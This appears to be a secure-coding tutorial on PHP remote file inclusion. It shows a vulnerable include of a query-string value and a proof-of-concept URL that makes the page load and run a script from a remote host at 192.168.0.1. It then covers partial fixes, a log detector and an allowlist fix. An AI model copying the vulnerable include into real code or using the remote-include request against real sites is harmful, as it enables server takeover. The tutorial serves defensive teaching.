Because PHP lets the same function operate on both local and remote files, a malicious user can make the site's PHP code include a file of their own choosing and so execute their own script. The following code includes different files depending on the file name given in the browser's address bar.
The code is as follows:
<?php
$file_name = $_GET["filename"]; // take the file name from the query string
include("$file_name");           // include the named file
// some other operations
?>
In this case a visitor can specify different file names in the address bar to include different files and execute their code. For example, opening http://localhost/test.php?filename=myinc.php in a browser includes and executes the file myinc.php.
The code above performs no error handling, so when it is run in the browser without any parameter the following output appears:
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
From this error message the visitor learns that the page is performing a file inclusion. An attacker can then place a script on a server they control. Note that when PHP fetches a remote file it receives the remote server's final output rather than the file itself, which is why the example below is served as a .txt file instead of being executed remotely. The script is on the server 192.168.0.1 under the file name hello.txt; its code is as follows.
The code is as follows:
<?php
echo "hello world!";
?>
Opening http://localhost/test.php?filename=http://192.168.0.1/hello.txt in the browser then runs the script contained in hello.txt.
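The request shown above leaves a recognisable trace in the web server's access log: a query-string value that is itself a URL. The following is an added example (not code from the original article) of a small log check that decodes each request's query string and flags any parameter whose value starts with a URL scheme; the log lines are constructed for illustration and the combined-log layout is assumed.

```php
<?php
// Added example: flag access-log requests whose query parameters carry a URL
// scheme, the shape of the remote inclusion request described above.
declare(strict_types=1);

// Constructed sample log lines (Apache combined format assumed).
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /test.php?filename=myinc HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /test.php?filename=http://192.168.0.1/hello.txt HTTP/1.1" 200 14
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /test.php?filename=HTTP%3A%2F%2F192.168.0.1%2Fhello.txt HTTP/1.1" 200 14
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
LOG;

/**
 * Return the query-string parameters of one log line whose value begins with
 * a URL scheme ("something://"). Values are URL-decoded first so that
 * percent-encoded schemes are seen through.
 *
 * @return array<string,string> parameter name => offending value
 */
function suspicious_params(string $line): array
{
    // The request line is the first quoted field: "METHOD /path?query HTTP/x.y"
    if (!preg_match('/"[A-Z]+ ([^ "]+) HTTP\/[0-9.]+"/', $line, $m)) {
        return [];
    }
    $pos = strpos($m[1], '?');
    if ($pos === false) {
        return [];                       // no query string at all
    }
    parse_str(substr($m[1], $pos + 1), $params); // parse_str also URL-decodes

    $hits = [];
    foreach ($params as $key => $value) {
        if (is_string($value) && preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[(string) $key] = $value;
        }
    }
    return $hits;
}

foreach (explode("\n", SAMPLE_LOG) as $line) {
    $hits = suspicious_params($line);
    if ($hits !== []) {
        echo "ALERT ", json_encode($hits), " in: ", $line, "\n";
    }
}
```

Run against the constructed lines, the two requests from 10.0.0.9 are reported (the plain and the percent-encoded form) while the local file names pass silently. The check is deliberately narrow: it looks only for a scheme prefix, so it is a cheap first-pass signal to feed into review rather than a complete detection of every inclusion attempt.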
One way to address this is to improve the error handling so that visitors cannot tell that the script includes the file named by the parameter. The modified code is as follows.
The code is as follows:
<?php
$file_name = $_GET["filename"];     // take the file name from the query string
if (!@include("$file_name.php"))    // include the file, suppressing PHP's warnings
{
    die("page browsing error");     // generic message instead of the include error
}
// some other operations
?>
After this change, if the included file cannot be found only the message "page browsing error" is shown, and the visitor cannot learn what the page does internally.
The second method can effectively prevent remote file inclusion attacks: it removes every slash "/" from the address-bar parameter, so that when a remote file address is supplied the code no longer receives it as a usable URL. The modified code is as follows.
The code is as follows:
<?php
$file_name = str_replace('/', '', $_GET["filename"]); // take the file name, stripping all slashes
if (!@include("$file_name.php"))    // include the file, suppressing PHP's warnings
{
    die("page browsing error");     // generic message instead of the include error
}
// some other operations
?>
Now when http://localhost/test.php?filename=http://192.168.0.1/hello.txt is requested, the file name actually included by the PHP code is http:192.168.0.1bugstest6_test; the page does not include the remote file and shows the error message instead.
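Both fixes above treat the symptom: suppressing the warning only hides the inclusion from the visitor, and stripping "/" blocks the one URL form shown while still passing an arbitrary user-controlled string to include. The more robust approach is to never include a user-supplied name at all and instead map the parameter onto a fixed allowlist of pages. The following is an added example (not the article's code) of that approach; the pages/ directory, the page names and the default page are assumptions for illustration.

```php
<?php
// Added example: include a page only when the requested name is on a fixed
// allowlist, instead of trying to sanitise the user-controlled string.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';   // assumed location of the includable pages

// Permitted request values and the file each one maps to (assumed names).
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to an absolute path, or return null when
 * the name is not allowlisted, the file is missing, or the resolved path does
 * not sit inside PAGE_DIR.
 */
function resolve_page(string $name): ?string
{
    if (!array_key_exists($name, PAGES)) {
        return null;                       // not an allowlisted value: reject
    }
    $path = realpath(PAGE_DIR . '/' . PAGES[$name]);
    $base = realpath(PAGE_DIR);
    if ($path === false || $base === false) {
        return null;                       // file or directory does not exist
    }
    // Defensive second check: the canonical path must stay under PAGE_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['filename'] ?? 'home';  // 'home' is the assumed default page
$page = resolve_page(is_string($requested) ? $requested : '');

if ($page === null) {
    // Log the rejected value for detection; show the visitor only a generic message.
    error_log('rejected page request: ' . var_export($requested, true));
    http_response_code(404);
    die('page browsing error');
}

include $page;
// some other operations
```

With this structure the query-string value never reaches include; it is only used as a key into PAGES, so a URL, a path or any other unexpected string is rejected before any file access happens. As a second layer, keep allow_url_include set to Off in php.ini (its default), so that include cannot open remote URLs even if an unsafe include survives elsewhere in the code base.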